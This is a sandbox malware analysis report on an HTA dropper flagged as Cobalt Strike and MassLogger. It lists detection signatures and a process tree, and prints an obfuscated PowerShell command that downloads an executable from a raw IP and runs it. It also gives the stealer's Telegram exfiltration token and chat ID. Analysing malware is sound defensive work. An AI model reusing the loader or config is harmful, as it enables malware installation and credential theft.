Windows
Analysis Report
wecreatebestthingsentirelifeforgivenyou.hta
Overview
General Information
Detection
Cobalt Strike, MSIL Logger, MassLogger RAT
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 6604 cmdline:
mshta.exe "C:\Users\ user\Deskt op\wecreat ebestthing sentirelif eforgiveny ou.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) cmd.exe (PID: 3712 cmdline:
"C:\Window s\system32 \cmd.exe" "/C poWErS heLL -Ex ByPass -NoP -w 1 -C DeViCECRe DENtialdEp lOyment ; iEx($(IE X('[SyStEM .teXt.encO DiNG]'+[Ch aR]58+[cHA R]0X3A+'Ut f8.gETsTri NG([SYStEM .CoNvErt]' +[CHaR]0X3 a+[chAR]58 +'FROMbASE 64STring(' +[ChAR]34+ 'JG1xZ0doI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgID0gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gQWRkLXR5c GUgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU1 FbWJlckRlZ kluSVRpT24 gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgJ1tEb GxJbXBvcnQ oInVSTG1vb iIsICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEN oYXJTZXQgP SBDaGFyU2V 0LlVuaWNvZ GUpXXB1Ymx pYyBzdGF0a WMgZXh0ZXJ uIEludFB0c iBVUkxEb3d ubG9hZFRvR mlsZShJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgW lFtV1RvTyx zdHJpbmcgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgVXlILHN 0cmluZyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBMSix1aW5 0ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIGssS W50UHRyICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIENZYlJFK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 uYU1FICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CJYeFBHb1l mdyIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL U5BTUVzcGF DZSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBjR WkgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLVB hc3NUaHJ1O yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAkbXF nR2g6OlVST ERvd25sb2F kVG9GaWxlK DAsImh0dHA 6Ly8xMDcuM Tc0LjIzMS4 yMTEvMzExL 2Nzc29zLmV 4ZSIsIiRFT nY6QVBQREF UQVxjb3NzZ S5leGUiLDA sMCk7c1Rhc nQtc0xlZVA oMyk7aU52b 2tlLWl0ZW0 gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIiRFb nY6QVBQREF UQVxjb3NzZ S5leGUi'+[ chAR]34+') )')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 1792 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5004 cmdline:
poWErSheLL -E x By Pass -NoP -w 1 - C De ViCECReDEN tialdEplOy ment ; i Ex($(IEX(' [SyStEM.te Xt.encODiN G]'+[ChaR] 58+[cHAR]0 X3A+'Utf8. gETsTriNG( [SYStEM.Co NvErt]'+[C HaR]0X3a+[ chAR]58+'F ROMbASE64S Tring('+[C hAR]34+'JG 1xZ0doICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ID0gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgQW RkLXR5cGUg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgLU1FbW JlckRlZklu SVRpT24gIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJ1tEbGxJ bXBvcnQoIn VSTG1vbiIs ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIENoYX JTZXQgPSBD aGFyU2V0Ll VuaWNvZGUp XXB1YmxpYy BzdGF0aWMg ZXh0ZXJuIE ludFB0ciBV UkxEb3dubG 9hZFRvRmls ZShJbnRQdH IgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgWlFt V1RvTyxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg VXlILHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBM Six1aW50IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIGssSW50 UHRyICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE NZYlJFKTsn ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1uYU 1FICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICJY eFBHb1lmdy IgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLU5B TUVzcGFDZS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBjRWkg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgLVBhc3 NUaHJ1OyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAkbXFnR2 g6OlVSTERv d25sb2FkVG 9GaWxlKDAs Imh0dHA6Ly 8xMDcuMTc0 LjIzMS4yMT EvMzExL2Nz c29zLmV4ZS IsIiRFTnY6 QVBQREFUQV xjb3NzZS5l eGUiLDAsMC k7c1RhcnQt c0xlZVAoMy k7aU52b2tl LWl0ZW0gIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIiRFbnY6 QVBQREFUQV xjb3NzZS5l eGUi'+[chA R]34+'))') ))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) csc.exe (PID: 1644 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\qrkmxxq1 \qrkmxxq1. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) cvtres.exe (PID: 2812 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S9E10.tmp" "c:\Users \user\AppD ata\Local\ Temp\qrkmx xq1\CSCA5E BD89D883B4 23C8D6CB33 CF6463C44. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) cosse.exe (PID: 920 cmdline:
"C:\Users\ user\AppDa ta\Roaming \cosse.exe " MD5: 709A4FFEC76D0C7715CB6A69A3610EDE) RegSvcs.exe (PID: 6960 cmdline:
"C:\Users\ user\AppDa ta\Roaming \cosse.exe " MD5: 9D352BC46709F0CB5EC974633A0C3C94)
svchost.exe (PID: 6012 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
{"EXfil Mode": "Telegram", "Telegram Token": "7996508565:AAHHBM6wSJS6GosO-ff2t38cxPw1t-vbBj8", "Telegram Chatid": "5758197122"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
Click to see the 17 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
Click to see the 13 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Michael Haag: |